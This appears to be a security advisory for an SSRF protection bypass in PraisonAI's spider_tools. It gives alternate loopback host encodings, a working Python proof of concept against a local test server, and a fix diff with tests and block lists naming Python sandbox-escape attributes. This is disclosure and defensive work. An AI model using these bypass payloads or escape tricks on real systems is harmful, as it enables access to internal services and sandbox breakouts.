PraisonAI spider_tools SSRF protection bypass via alternate loopback host encodings
Description
Summary
PraisonAI's spider_tools URL validation can be bypassed using alternate loopback host encodings.
The affected component is:
praisonaiagents/tools/spider_tools.py
`The tool contains a URL validation function intended to block local or unsafe targets before fetching attacker-controlled URLs. However, the validation only blocks a small set of exact host strings such as localhost and 127.0.0.1.
It does not normalize hostnames, resolve DNS, parse numeric IPv4 variants, or validate the final resolved IP address before making the request.
As a result, URLs such as the following bypass the protection and still reach loopback services:
http://localhost.:8765/
http://127.1:8765/
http://0177.0.0.1:8765/
http://0x7f000001:8765/
http://2130706433:8765/
After the weak validation passes, scrape_page() calls requests.Session.get() on the attacker-controlled URL. This allows an attacker who can influence URLs passed to scrape_page, crawl, or extract_text to induce SSRF requests against loopback-only services.
This is a server-side request forgery protection bypass.
Details
The affected code is in:
praisonaiagents/tools/spider_tools.py
The vulnerable flow is:
attacker-controlled URL
-> spider_tools._validate_url(...)
-> weak exact-host blocklist check
-> validation passes for alternate loopback encodings
-> scrape_page(...)
-> requests.Session.get(attacker_url)
-> loopback service is reached
The validation appears to block only exact local hostnames or exact IPv4 strings. For example, it blocks simple forms such as:
localhost
127.0.0.1
However, equivalent loopback forms are not rejected before the request is made.
Confirmed bypass examples:
http://localhost.:8765/
http://127.1:8765/
http://0177.0.0.1:8765/
http://0x7f000001:8765/
http://2130706433:8765/
These values can resolve or be interpreted as loopback addresses by the HTTP client / underlying networking stack, while bypassing the string-based validation.
The issue is not that spider_tools can fetch arbitrary URLs. The issue is that it attempts to provide SSRF protection, but the protection can be bypassed with alternate representations of loopback addresses.
PoC
The following PoC is non-destructive. It starts a local HTTP server on 127.0.0.1:8765, then sends several alternate loopback URL forms through the real spider_tools validation/fetch path.
The expected secure behavior is that all loopback variants should be rejected before any HTTP request is made.
The actual vulnerable behavior is that the alternate loopback forms pass validation and reach the local server.
Full
PoC
#!/usr/bin/env python3
"""PoC for PraisonAI spider_tools localhost-alias SSRF bypass."""
from __future__ import annotations
import sys
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path
REPO_ROOT = Path(__file__).resolve().parents[3] / "repos" / "praisonai"
AGENTS_ROOT = REPO_ROOT / "src" / "praisonai-agents"
SPIDER_TOOLS = AGENTS_ROOT / "praisonaiagents/tools/spider_tools.py"
def verify_source() -> None:
expected = [
"def _validate_url",
"requests.Session",
".get(",
]
text = SPIDER_TOOLS.read_text(encoding="utf-8")
for needle in expected:
if needle not in text:
raise RuntimeError(f"source verification failed: {needle!r} not found in {SPIDER_TOOLS}")
class LocalHandler(BaseHTTPRequestHandler):
hits: list[tuple[str, str | None]] = []
body = b"LOCAL-SPIDER-SSRF-SECRET"
def do_GET(self) -> None: # noqa: N802
self.__class__.hits.append((self.path, self.headers.get("Host")))
self.send_response(200)
self.send_header("Content-Type", "text/plain")
self.send_header("Content-Length", str(len(self.body)))
self.end_headers()
self.wfile.write(self.body)
def log_message(self, format: str, *args) -> None: # noqa: A003
return
def main() -> int:
if not SPIDER_TOOLS.exists():
raise SystemExit("missing local PraisonAI source tree")
verify_source()
sys.path.insert(0, str(AGENTS_ROOT))
# Import the real shipped implementation.
#
# Depending on the exact public API exposed by spider_tools.py,
# use the exported scrape function available in the local version.
# The important path is:
#
# _validate_url(url)
# -> requests.Session.get(url)
#
import praisonaiagents.tools.spider_tools as spider_tools
server = HTTPServer(("127.0.0.1", 8765), LocalHandler)
thread = threading.Thread(target=server.serve_forever, daemon=True)
thread.start()
candidates = [
"http://localhost.:8765/",
"http://127.1:8765/",
"http://0177.0.0.1:8765/",
"http://0x7f000001:8765/",
"http://2130706433:8765/",
]
try:
for url in candidates:
LocalHandler.hits.clear()
try:
# Prefer the real public scraping API when available.
if hasattr(spider_tools, "scrape_page"):
result = spider_tools.scrape_page(url)
elif hasattr(spider_tools, "extract_text"):
result = spider_tools.extract_text(url)
elif hasattr(spider_tools, "crawl"):
result = spider_tools.crawl(url)
else:
raise RuntimeError("No expected spider_tools public fetch function found")
reached = bool(LocalHandler.hits)
contains_secret = "LOCAL-SPIDER-SSRF-SECRET" in str(result)
print(f"{url} passed=True reached_loopback={reached} contains_secret={contains_secret}")
if not reached:
raise SystemExit(f"[poc] MISS: {url} did not reach loopback server")
except Exception as exc:
print(f"{url} blocked_or_failed={type(exc).__name__}: {exc}")
raise
finally:
server.shutdown()
server.server_close()
thread.join(timeout=1)
print("[poc] HIT: alternate loopback URL forms bypassed spider_tools SSRF protection")
return 0
if __name__ == "__main__":
raise SystemExit(main())
Confirmed local result
The following bypasses were confirmed locally:
localhost. True ok ok local hit
127.1 True ok ok local hit
0177.0.0.1 True ok ok local hit
0x7f000001 True ok ok local hit
2130706433 True ok ok local hit
This demonstrates that the validation allows alternate loopback representations and that the request reaches a local-only HTTP service.
Expected secure behavior
All loopback-equivalent addresses should be blocked before the HTTP request is made.
Examples that should be rejected:
http://localhost/
http://localhost./
http://127.0.0.1/
http://127.1/
http://0177.0.0.1/
http://0x7f000001/
http://2130706433/
http://[::1]/
Actual vulnerable behavior
Several alternate loopback representations pass validation and are fetched by the tool.
Impact
An attacker who can influence URLs passed to PraisonAI's spider tools can cause the process to send HTTP requests to loopback-only services.
Potential impact includes:
- SSRF against localhost-only admin panels or development servers;
- access to local HTTP services that are not intended to be reachable remotely;
- retrieval of local service responses into the agent/tool output;
- possible access to cloud metadata or private-network services if equivalent bypasses exist for those address ranges in a given deployment.
The most direct confirmed impact is loopback SSRF through alternate hostname/IP encodings.
This report does not claim arbitrary TCP access or remote code execution. The demonstrated behavior is HTTP(S) SSRF through the spider URL-fetching feature.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
PraisonAI's spider_tools URL validation bypass allows SSRF to loopback services via alternate host encodings.
Vulnerability
The vulnerability resides in praisonaiagents/tools/spider_tools.py in PraisonAI. The _validate_url function only blocks exact strings like localhost and 127.0.0.1 but does not normalize or resolve hostnames. Alternate loopback encodings such as localhost., 127.1, 0177.0.0.1, 0x7f000001, and 2130706433 bypass validation [1][2].
Exploitation
An attacker who can influence URLs passed to scrape_page, crawl, or extract_text can provide a URL using an alternate loopback encoding (e.g., http://127.1:8765/). The weak validation passes, and requests.Session.get() makes a request to the loopback service [1][2].
Impact
Successful exploitation allows the attacker to perform Server-Side Request Forgery (SSRF) against loopback-only services, potentially accessing internal services or sensitive data [1][2].
Mitigation
As of the advisory publication, no fix has been released. Developers should update to a patched version when available, or implement additional URL normalization and IP validation before requests [1][2].
AI Insight generated on May 29, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
praisonaiagentsPyPI | < 1.6.40 | 1.6.40 |
PraisonAIPyPI | < 4.6.40 | 4.6.40 |
Affected products
2Patches
2179cab02dbecrefactor: harden input validation and access controls
19 files changed · +425 −100
.github/workflows/claude.yml+5 −2 modified@@ -181,12 +181,15 @@ jobs: - name: Fetch PR branch and Setup Remote if: github.event.issue.pull_request + env: + PR_BRANCH: ${{ steps.check_fork.outputs.pr_branch }} + IS_FORK: ${{ steps.check_fork.outputs.is_fork }} run: | # Fetch PR head from base repo and put it into local branch - git fetch origin pull/${{ github.event.issue.number }}/head:${{ steps.check_fork.outputs.pr_branch }} + git fetch origin pull/${{ github.event.issue.number }}/head:"${PR_BRANCH}" # If it's a fork, make origin point to local to trick claude-code-action's `git fetch origin <branch>` - if [ "${{ steps.check_fork.outputs.is_fork }}" == "true" ]; then + if [ "${IS_FORK}" = "true" ]; then git remote set-url origin file://$(pwd) fi
src/praisonai-agents/praisonaiagents/tools/mentions.py+5 −0 modified@@ -268,6 +268,11 @@ def _process_rule_mention(self, rule_name: str) -> Optional[str]: def _process_url_mention(self, url: str) -> Optional[str]: """Process @url:https://... mention.""" try: + from praisonaiagents.tools.spider_tools import SpiderTools + + if not SpiderTools()._validate_url(url): + return f"# URL: {url}\n[Blocked: URL is not allowed]" + import urllib.request req = urllib.request.Request(
src/praisonai-agents/praisonaiagents/tools/python_tools.py+55 −48 modified@@ -36,6 +36,30 @@ def _safe_getattr(obj, name, *default): return getattr(obj, name, *default) if default else getattr(obj, name) +_SANDBOX_BLOCKED_ATTRS = frozenset({ + '__subclasses__', '__bases__', '__mro__', '__globals__', + '__code__', '__class__', '__dict__', '__builtins__', + '__import__', '__loader__', '__spec__', '__init_subclass__', + '__set_name__', '__reduce__', '__reduce_ex__', + '__traceback__', '__qualname__', '__module__', + '__wrapped__', '__closure__', '__annotations__', + '__self__', # C builtins leak real builtins module (GHSA-4mr5-g6f9-cfrh) + # Frame/code object introspection + 'gi_frame', 'gi_code', 'cr_frame', 'cr_code', + 'ag_frame', 'ag_code', 'tb_frame', 'tb_next', + 'f_globals', 'f_locals', 'f_builtins', 'f_code', + 'co_consts', 'co_names', + '__getattribute__', '__getattr__', '__setattr__', '__delattr__', + '__dir__', '__get__', '__set__', '__delete__', +}) + +_SANDBOX_BLOCKED_CALLS = frozenset({ + 'exec', 'eval', 'compile', '__import__', + 'open', 'input', 'breakpoint', + 'setattr', 'delattr', 'dir', 'vars', +}) + + def _validate_code_ast(code: str): """Validate code using AST — catches attacks that bypass text checks. @@ -48,52 +72,33 @@ def _validate_code_ast(code: str): except SyntaxError: return None # let compile() handle syntax errors later - # Dangerous dunder attributes attackers use for sandbox escape - _blocked_attrs = frozenset({ - '__subclasses__', '__bases__', '__mro__', '__globals__', - '__code__', '__class__', '__dict__', '__builtins__', - '__import__', '__loader__', '__spec__', '__init_subclass__', - '__set_name__', '__reduce__', '__reduce_ex__', - '__traceback__', '__qualname__', '__module__', - '__wrapped__', '__closure__', '__annotations__', - # Frame/code object introspection - 'gi_frame', 'gi_code', 'cr_frame', 'cr_code', - 'ag_frame', 'ag_code', 'tb_frame', 'tb_next', - 'f_globals', 'f_locals', 'f_builtins', 'f_code', - 'co_consts', 'co_names', - '__getattribute__', '__getattr__', '__setattr__', '__delattr__', - '__dir__', '__get__', '__set__', '__delete__', - }) - for node in ast.walk(tree): # Block import statements if isinstance(node, (ast.Import, ast.ImportFrom)): return f"Import statements are not allowed" # Block attribute access to dangerous dunders if isinstance(node, ast.Attribute): - if node.attr in _blocked_attrs: + if node.attr in _SANDBOX_BLOCKED_ATTRS: return ( f"Access to attribute '{node.attr}' is restricted" ) - # Block calls to dangerous builtins by name + # Block calls to dangerous builtins (bare name or attribute access) if isinstance(node, ast.Call): func = node.func - if isinstance(func, ast.Name) and func.id in ( - 'exec', 'eval', 'compile', '__import__', - 'open', 'input', 'breakpoint', - 'setattr', 'delattr', 'dir', - ): + if isinstance(func, ast.Name) and func.id in _SANDBOX_BLOCKED_CALLS: return f"Call to '{func.id}' is not allowed" + if isinstance(func, ast.Attribute) and func.attr in _SANDBOX_BLOCKED_CALLS: + return f"Call to '{func.attr}' is not allowed" # Block dangerous constants (strings containing dunders) # Fallback for Python 3.7 ast.Str if isinstance(node, ast.Constant) and isinstance(node.value, str): - if any(attr in node.value for attr in _blocked_attrs): + if any(attr in node.value for attr in _SANDBOX_BLOCKED_ATTRS): return f"String constant contains restricted attribute name" elif type(node).__name__ == 'Str': - if any(attr in getattr(node, 's', '') for attr in _blocked_attrs): + if any(attr in getattr(node, 's', '') for attr in _SANDBOX_BLOCKED_ATTRS): return f"String constant contains restricted attribute name" return None @@ -112,7 +117,16 @@ def _execute_code_sandboxed( """ if limits is None: limits = ResourceLimits.minimal() - + + ast_error = _validate_code_ast(code) + if ast_error: + return { + 'result': None, + 'stdout': '', + 'stderr': f'Security Error: {ast_error}', + 'success': False, + } + try: # Create temporary file for the code with tempfile.NamedTemporaryFile(mode='w', suffix='.py', delete=False) as f: @@ -151,21 +165,8 @@ def safe_execute(): }} # Block dangerous patterns - blocked_attrs = {{ - '__subclasses__', '__bases__', '__mro__', '__globals__', - '__code__', '__class__', '__dict__', '__builtins__', - '__import__', '__loader__', '__spec__', '__init_subclass__', - '__set_name__', '__reduce__', '__reduce_ex__', - '__traceback__', '__qualname__', '__module__', - '__wrapped__', '__closure__', '__annotations__', - # Frame/code object introspection - 'gi_frame', 'gi_code', 'cr_frame', 'cr_code', - 'ag_frame', 'ag_code', 'tb_frame', 'tb_next', - 'f_globals', 'f_locals', 'f_builtins', 'f_code', - 'co_consts', 'co_names', - '__getattribute__', '__getattr__', '__setattr__', '__delattr__', - '__dir__', '__get__', '__set__', '__delete__', - }} + blocked_attrs = {set(_SANDBOX_BLOCKED_ATTRS)!r} + blocked_calls = {set(_SANDBOX_BLOCKED_CALLS)!r} for node in ast.walk(tree): if isinstance(node, (ast.Import, ast.ImportFrom)): @@ -182,14 +183,20 @@ def safe_execute(): "stderr": f"Access to attribute '{{node.attr}}' is restricted", "success": False }} - if isinstance(node, ast.Call) and isinstance(node.func, ast.Name): - if node.func.id in ('exec', 'eval', 'compile', '__import__', - 'open', 'input', 'breakpoint', - 'setattr', 'delattr', 'dir'): + if isinstance(node, ast.Call): + func = node.func + if isinstance(func, ast.Name) and func.id in blocked_calls: + return {{ + "result": None, + "stdout": "", + "stderr": f"Call to '{{func.id}}' is not allowed", + "success": False + }} + if isinstance(func, ast.Attribute) and func.attr in blocked_calls: return {{ "result": None, "stdout": "", - "stderr": f"Call to '{{node.func.id}}' is not allowed", + "stderr": f"Call to '{{func.attr}}' is not allowed", "success": False }} if isinstance(node, ast.Constant) and isinstance(node.value, str): @@ -481,7 +488,7 @@ def _execute_code_direct( '__import__', 'import ', 'from ', 'exec', 'eval', 'compile', 'open(', 'file(', 'input(', 'raw_input', '__subclasses__', '__bases__', '__globals__', '__code__', - '__class__', 'globals(', 'locals(', 'vars(' + '__class__', '__self__', 'globals(', 'locals(', 'vars(' ] code_lower = code.lower()
src/praisonai-agents/praisonaiagents/tools/spider_tools.py+46 −24 modified@@ -11,6 +11,8 @@ """ import logging +import ipaddress +import socket from typing import List, Dict, Union, Optional, Any from importlib import util import json @@ -20,6 +22,48 @@ import hashlib import time + +def _host_is_blocked(hostname: str) -> bool: + """Return True when hostname resolves to loopback/private/internal targets.""" + if not hostname: + return True + host = hostname.lower().rstrip(".") + if host in ("localhost", "0.0.0.0", "::1") or host.endswith(".localhost"): + return True + if host in ("169.254.169.254", "metadata.google.internal"): + return True + if any(host.endswith(suffix) for suffix in (".local", ".internal", ".localdomain")): + return True + + def _ip_blocked(ip: ipaddress._BaseAddress) -> bool: + return bool( + ip.is_private or ip.is_loopback or ip.is_reserved or ip.is_link_local + ) + + if host.isdigit(): + try: + return _ip_blocked(ipaddress.ip_address(int(host))) + except (ValueError, OverflowError): + return True + + if host.startswith("0x"): + try: + return _ip_blocked(ipaddress.ip_address(int(host, 16))) + except (ValueError, OverflowError): + return True + + try: + return _ip_blocked(ipaddress.ip_address(host)) + except ValueError: + pass + + try: + return _ip_blocked(ipaddress.ip_address(socket.inet_aton(host))) + except OSError: + pass + + return False + class SpiderTools: """Tools for web scraping and crawling.""" @@ -59,31 +103,9 @@ def _validate_url(self, url: str) -> bool: if not parsed.hostname: return False - # Reject local/internal addresses - hostname = parsed.hostname.lower() - - # Block localhost and loopback - if hostname in ['localhost', '127.0.0.1', '0.0.0.0', '::1']: - return False - - # Block private IP ranges - import ipaddress - try: - ip = ipaddress.ip_address(hostname) - if ip.is_private or ip.is_reserved or ip.is_loopback or ip.is_link_local: - return False - except ValueError: - # Not an IP address, continue with domain validation - pass - - # Block common internal domains - if any(hostname.endswith(domain) for domain in ['.local', '.internal', '.localdomain']): - return False - - # Block metadata service endpoints - if hostname in ['169.254.169.254', 'metadata.google.internal']: + if _host_is_blocked(parsed.hostname): return False - + return True except Exception:
src/praisonai-agents/tests/unit/tools/test_mentions_url_ssrf.py+10 −0 added@@ -0,0 +1,10 @@ +"""@url mentions must not fetch loopback targets.""" + +from praisonaiagents.tools.mentions import MentionsParser + + +def test_url_mention_blocks_loopback(): + parser = MentionsParser() + result = parser._process_url_mention("http://127.0.0.1:8765/") + assert result is not None + assert "Blocked" in result
src/praisonai-agents/tests/unit/tools/test_python_tools_sandbox.py+16 −0 modified@@ -112,6 +112,22 @@ def test_dunder_import_blocked(self, sandbox): result = sandbox.run("__import__('os')") assert result["success"] is False + def test_print_self_blocked(self, sandbox): + """print.__self__ leaks real builtins module (GHSA-4mr5-g6f9-cfrh).""" + result = sandbox.run("b = print.__self__") + assert result["success"] is False + assert "restricted" in result["stderr"].lower() + + def test_vars_call_blocked(self, sandbox): + """vars() can expose builtins.__dict__ after __self__ leak.""" + result = sandbox.run("vars({})") + assert result["success"] is False + + def test_attribute_dunder_call_blocked(self, sandbox): + """Attribute calls bypass bare-name Call checks.""" + result = sandbox.run("(1).__class__.__mro__") + assert result["success"] is False + # ── Legitimate Code (all must PASS) ─────────────────────────────────────────
src/praisonai-agents/tests/unit/tools/test_spider_url_validation.py+10 −0 modified@@ -38,6 +38,16 @@ def test_still_blocks_loopback(): assert spider._validate_url("http://localhost/") is False +def test_blocks_alternate_loopback_encodings(): + """GHSA-5c6w-wwfq-7qqm: non-canonical loopback host forms.""" + spider = SpiderTools() + assert spider._validate_url("http://localhost.:8765/") is False + assert spider._validate_url("http://127.1:8765/") is False + assert spider._validate_url("http://0177.0.0.1:8765/") is False + assert spider._validate_url("http://0x7f000001:8765/") is False + assert spider._validate_url("http://2130706433:8765/") is False + + def test_rejects_non_string_input(): spider = SpiderTools() assert spider._validate_url(None) is False # type: ignore[arg-type]
src/praisonai-platform/praisonai_platform/api/deps.py+36 −0 modified@@ -71,3 +71,39 @@ async def require_workspace_member( ) user.workspace_id = workspace_id return user + + +async def require_workspace_admin( + workspace_id: str, + user: AuthIdentity = Depends(get_current_user), + session: AsyncSession = Depends(get_db), +) -> AuthIdentity: + """Require admin or owner role in the workspace.""" + return await require_workspace_member( + workspace_id, user, session, min_role="admin" + ) + + +async def require_workspace_owner( + workspace_id: str, + user: AuthIdentity = Depends(get_current_user), + session: AsyncSession = Depends(get_db), +) -> AuthIdentity: + """Require owner role in the workspace.""" + return await require_workspace_member( + workspace_id, user, session, min_role="owner" + ) + + +def ensure_resource_in_workspace( + resource_workspace_id: str | None, + workspace_id: str, + *, + label: str = "Resource", +) -> None: + """Reject cross-workspace access (IDOR) with a generic 404.""" + if resource_workspace_id != workspace_id: + raise HTTPException( + status_code=status.HTTP_404_NOT_FOUND, + detail=f"{label} not found", + )
src/praisonai-platform/praisonai_platform/api/routes/agents.py+7 −1 modified@@ -9,7 +9,7 @@ from praisonaiagents.auth import AuthIdentity -from ..deps import get_db, require_workspace_member +from ..deps import ensure_resource_in_workspace, get_db, require_workspace_member from ..schemas import AgentCreate, AgentResponse, AgentUpdate from ...services.agent_service import AgentService @@ -61,6 +61,7 @@ async def get_agent( agent = await svc.get(agent_id) if agent is None: raise HTTPException(status_code=404, detail="Agent not found") + ensure_resource_in_workspace(agent.workspace_id, workspace_id, label="Agent") return AgentResponse.model_validate(agent) @@ -84,6 +85,7 @@ async def update_agent( ) if agent is None: raise HTTPException(status_code=404, detail="Agent not found") + ensure_resource_in_workspace(agent.workspace_id, workspace_id, label="Agent") return AgentResponse.model_validate(agent) @@ -95,6 +97,10 @@ async def delete_agent( session: AsyncSession = Depends(get_db), ): svc = AgentService(session) + agent = await svc.get(agent_id) + if agent is None: + raise HTTPException(status_code=404, detail="Agent not found") + ensure_resource_in_workspace(agent.workspace_id, workspace_id, label="Agent") deleted = await svc.delete(agent_id) if not deleted: raise HTTPException(status_code=404, detail="Agent not found")
src/praisonai-platform/praisonai_platform/api/routes/issues.py+17 −1 modified@@ -9,7 +9,7 @@ from praisonaiagents.auth import AuthIdentity -from ..deps import get_db, require_workspace_member +from ..deps import ensure_resource_in_workspace, get_db, require_workspace_member from ..schemas import ( CommentCreate, CommentResponse, @@ -90,6 +90,7 @@ async def get_issue( issue = await svc.get(issue_id) if issue is None: raise HTTPException(status_code=404, detail="Issue not found") + ensure_resource_in_workspace(issue.workspace_id, workspace_id, label="Issue") return IssueResponse.model_validate(issue) @@ -114,6 +115,7 @@ async def update_issue( ) if issue is None: raise HTTPException(status_code=404, detail="Issue not found") + ensure_resource_in_workspace(issue.workspace_id, workspace_id, label="Issue") act_svc = ActivityService(session) await act_svc.log( workspace_id, "issue.updated", "issue", issue.id, @@ -132,6 +134,10 @@ async def delete_issue( session: AsyncSession = Depends(get_db), ): svc = IssueService(session) + issue = await svc.get(issue_id) + if issue is None: + raise HTTPException(status_code=404, detail="Issue not found") + ensure_resource_in_workspace(issue.workspace_id, workspace_id, label="Issue") deleted = await svc.delete(issue_id) if not deleted: raise HTTPException(status_code=404, detail="Issue not found") @@ -148,6 +154,11 @@ async def add_comment( user: AuthIdentity = Depends(require_workspace_member), session: AsyncSession = Depends(get_db), ): + issue_svc = IssueService(session) + issue = await issue_svc.get(issue_id) + if issue is None: + raise HTTPException(status_code=404, detail="Issue not found") + ensure_resource_in_workspace(issue.workspace_id, workspace_id, label="Issue") svc = CommentService(session) comment = await svc.create( issue_id=issue_id, @@ -166,6 +177,11 @@ async def list_comments( user: AuthIdentity = Depends(require_workspace_member), session: AsyncSession = Depends(get_db), ): + issue_svc = IssueService(session) + issue = await issue_svc.get(issue_id) + if issue is None: + raise HTTPException(status_code=404, detail="Issue not found") + ensure_resource_in_workspace(issue.workspace_id, workspace_id, label="Issue") svc = CommentService(session) comments = await svc.list_for_issue(issue_id) return [CommentResponse.model_validate(c) for c in comments]
src/praisonai-platform/praisonai_platform/api/routes/workspaces.py+55 −6 modified@@ -9,7 +9,13 @@ from praisonaiagents.auth import AuthIdentity -from ..deps import get_current_user, get_db, require_workspace_member +from ..deps import ( + get_current_user, + get_db, + require_workspace_admin, + require_workspace_member, + require_workspace_owner, +) from ..schemas import ( MemberAdd, MemberResponse, @@ -64,7 +70,7 @@ async def get_workspace( async def update_workspace( workspace_id: str, body: WorkspaceUpdate, - user: AuthIdentity = Depends(require_workspace_member), + user: AuthIdentity = Depends(require_workspace_admin), session: AsyncSession = Depends(get_db), ): ws_svc = WorkspaceService(session) @@ -77,7 +83,7 @@ async def update_workspace( @router.delete("/{workspace_id}", status_code=status.HTTP_204_NO_CONTENT) async def delete_workspace( workspace_id: str, - user: AuthIdentity = Depends(require_workspace_member), + user: AuthIdentity = Depends(require_workspace_owner), session: AsyncSession = Depends(get_db), ): ws_svc = WorkspaceService(session) @@ -93,10 +99,16 @@ async def delete_workspace( async def add_member( workspace_id: str, body: MemberAdd, - user: AuthIdentity = Depends(require_workspace_member), + user: AuthIdentity = Depends(require_workspace_admin), session: AsyncSession = Depends(get_db), ): member_svc = MemberService(session) + if body.role == "owner": + if not await member_svc.has_role(workspace_id, user.id, "owner"): + raise HTTPException( + status_code=status.HTTP_403_FORBIDDEN, + detail="Only owners can add another owner", + ) member = await member_svc.add(workspace_id, body.user_id, body.role) return MemberResponse.model_validate(member) @@ -117,10 +129,32 @@ async def update_member_role( workspace_id: str, user_id: str, body: MemberUpdate, - user: AuthIdentity = Depends(require_workspace_member), + user: AuthIdentity = Depends(require_workspace_admin), session: AsyncSession = Depends(get_db), ): member_svc = MemberService(session) + target = await member_svc.get(workspace_id, user_id) + if target is None: + raise HTTPException(status_code=404, detail="Member not found") + if user_id == user.id and body.role != target.role: + raise HTTPException( + status_code=status.HTTP_403_FORBIDDEN, + detail="Cannot change your own role", + ) + if body.role == "owner" and not await member_svc.has_role( + workspace_id, user.id, "owner" + ): + raise HTTPException( + status_code=status.HTTP_403_FORBIDDEN, + detail="Only owners can assign the owner role", + ) + if target.role == "owner" and not await member_svc.has_role( + workspace_id, user.id, "owner" + ): + raise HTTPException( + status_code=status.HTTP_403_FORBIDDEN, + detail="Only owners can change an owner's role", + ) member = await member_svc.update_role(workspace_id, user_id, body.role) if member is None: raise HTTPException(status_code=404, detail="Member not found") @@ -131,10 +165,25 @@ async def update_member_role( async def remove_member( workspace_id: str, user_id: str, - user: AuthIdentity = Depends(require_workspace_member), + user: AuthIdentity = Depends(require_workspace_admin), session: AsyncSession = Depends(get_db), ): member_svc = MemberService(session) + if user_id == user.id: + raise HTTPException( + status_code=status.HTTP_403_FORBIDDEN, + detail="Cannot remove yourself from the workspace", + ) + target = await member_svc.get(workspace_id, user_id) + if target is None: + raise HTTPException(status_code=404, detail="Member not found") + if target.role == "owner" and not await member_svc.has_role( + workspace_id, user.id, "owner" + ): + raise HTTPException( + status_code=status.HTTP_403_FORBIDDEN, + detail="Only owners can remove an owner", + ) removed = await member_svc.remove(workspace_id, user_id) if not removed: raise HTTPException(status_code=404, detail="Member not found")
src/praisonai-platform/praisonai_platform/services/auth_service.py+4 −0 modified@@ -113,6 +113,10 @@ async def login(self, email: str, password: str) -> Optional[tuple[User, str]]: def _issue_token(self, user: User) -> str: """Issue a JWT for a user.""" + if JWT_SECRET == _DEFAULT_SECRET and os.environ.get("PLATFORM_ENV", "dev") != "dev": + raise RuntimeError( + "Refusing to issue JWT with default PLATFORM_JWT_SECRET outside dev" + ) now = datetime.now(timezone.utc) payload = { "sub": user.id,
src/praisonai-platform/tests/test_workspace_rbac.py+18 −0 added@@ -0,0 +1,18 @@ +"""Workspace member RBAC and cross-workspace IDOR guards.""" + +from __future__ import annotations + +import pytest +from fastapi import HTTPException + +from praisonai_platform.api.deps import ensure_resource_in_workspace + + +def test_ensure_resource_in_workspace_rejects_mismatch(): + with pytest.raises(HTTPException) as exc: + ensure_resource_in_workspace("ws-a", "ws-b", label="Issue") + assert exc.value.status_code == 404 + + +def test_ensure_resource_in_workspace_allows_match(): + ensure_resource_in_workspace("ws-a", "ws-a", label="Issue")
src/praisonai/praisonai/api/agent_invoke.py+14 −2 modified@@ -29,14 +29,26 @@ # Authentication import os CALL_SERVER_TOKEN = os.getenv('CALL_SERVER_TOKEN') +_CALL_AUTH_DISABLED = os.getenv('PRAISONAI_CALL_AUTH', '').lower() == 'disabled' + async def verify_token( request: Request, authorization: Optional[str] = Header(None) ) -> None: """Verify API token for authentication.""" - if not FASTAPI_AVAILABLE or not CALL_SERVER_TOKEN: - return # No authentication if FastAPI unavailable or no token set + if not FASTAPI_AVAILABLE: + return + if _CALL_AUTH_DISABLED: + return + if not CALL_SERVER_TOKEN: + raise HTTPException( + status_code=503, + detail=( + "CALL_SERVER_TOKEN is not configured. Set CALL_SERVER_TOKEN or " + "PRAISONAI_CALL_AUTH=disabled to run without authentication." + ), + ) token = None
src/praisonai/praisonai/code/tools/write_file.py+10 −11 modified@@ -58,9 +58,10 @@ def write_file( >>> if result['success']: ... print(f"Wrote to {result['path']}") """ - # Resolve path - if workspace and not os.path.isabs(path): - abs_path = os.path.abspath(os.path.join(workspace, path)) + # Resolve path — default workspace is cwd so relative paths cannot escape + effective_workspace = workspace or os.getcwd() + if not os.path.isabs(path): + abs_path = os.path.abspath(os.path.join(effective_workspace, path)) else: abs_path = os.path.abspath(path) @@ -73,14 +74,12 @@ def write_file( 'path': path, } - # Security check - ensure path is within workspace if specified - if workspace: - if not is_path_within_directory(abs_path, workspace): - return { - 'success': False, - 'error': f"Path '{path}' is outside the workspace", - 'path': path, - } + if not is_path_within_directory(abs_path, effective_workspace): + return { + 'success': False, + 'error': f"Path '{path}' is outside the workspace", + 'path': path, + } # Process content processed_content = content
src/praisonai/praisonai/mcp_server/adapters/cli_tools.py+33 −5 modified@@ -21,6 +21,31 @@ logger = logging.getLogger(__name__) +def _resolve_cwd_yaml_path(file_path: str) -> "Path": + """Resolve a YAML path strictly inside the current working directory.""" + from pathlib import Path + + if not isinstance(file_path, str) or not file_path: + raise ValueError("file_path must be a non-empty string") + if ( + "/" in file_path + or "\\" in file_path + or "\x00" in file_path + or file_path.startswith(".") + or file_path in ("..", ".") + ): + raise ValueError(f"invalid file_path: {file_path!r}") + if not file_path.endswith((".yaml", ".yml")): + raise ValueError("file_path must be a .yaml or .yml file") + base = Path.cwd().resolve() + candidate = (base / file_path).resolve() + try: + candidate.relative_to(base) + except ValueError as exc: + raise ValueError(f"invalid file_path: {file_path!r}") from exc + return candidate + + def register_cli_tools() -> None: """Register CLI-based MCP tools.""" @@ -44,7 +69,8 @@ def workflow_validate(file_path: str) -> str: """Validate a workflow YAML file.""" try: import yaml - with open(file_path, 'r') as f: + yaml_path = _resolve_cwd_yaml_path(file_path) + with open(yaml_path, 'r') as f: config = yaml.safe_load(f) required = ["framework", "topic"] @@ -64,9 +90,10 @@ def workflow_validate(file_path: str) -> str: def workflow_show(file_path: str) -> str: """Show workflow configuration.""" try: - with open(file_path, 'r') as f: - content = f.read() - return content + yaml_path = _resolve_cwd_yaml_path(file_path) + return yaml_path.read_text() + except ValueError as e: + return f"Error: {e}" except FileNotFoundError: return f"File not found: {file_path}" except Exception as e: @@ -417,7 +444,8 @@ def deploy_validate(config_path: str = "deploy.yaml") -> str: """Validate deployment configuration.""" try: import yaml - with open(config_path, 'r') as f: + yaml_path = _resolve_cwd_yaml_path(config_path) + with open(yaml_path, 'r') as f: config = yaml.safe_load(f) required = ["name", "type"]
src/praisonai/tests/unit/code/test_write_file_workspace.py+23 −0 added@@ -0,0 +1,23 @@ +"""write_file must constrain paths when workspace is omitted.""" + +from __future__ import annotations + +import os + +from praisonai.code.tools.write_file import write_file + + +def test_write_file_without_workspace_stays_in_cwd(tmp_path, monkeypatch): + monkeypatch.chdir(tmp_path) + ok = write_file("out.txt", "hello", workspace=None) + assert ok["success"] is True + assert (tmp_path / "out.txt").read_text() == "hello" + + +def test_write_file_without_workspace_blocks_escape(tmp_path, monkeypatch): + project = tmp_path / "project" + project.mkdir() + monkeypatch.chdir(project) + result = write_file("../outside.txt", "nope", workspace=None) + assert result["success"] is False + assert "outside" in result["error"].lower()
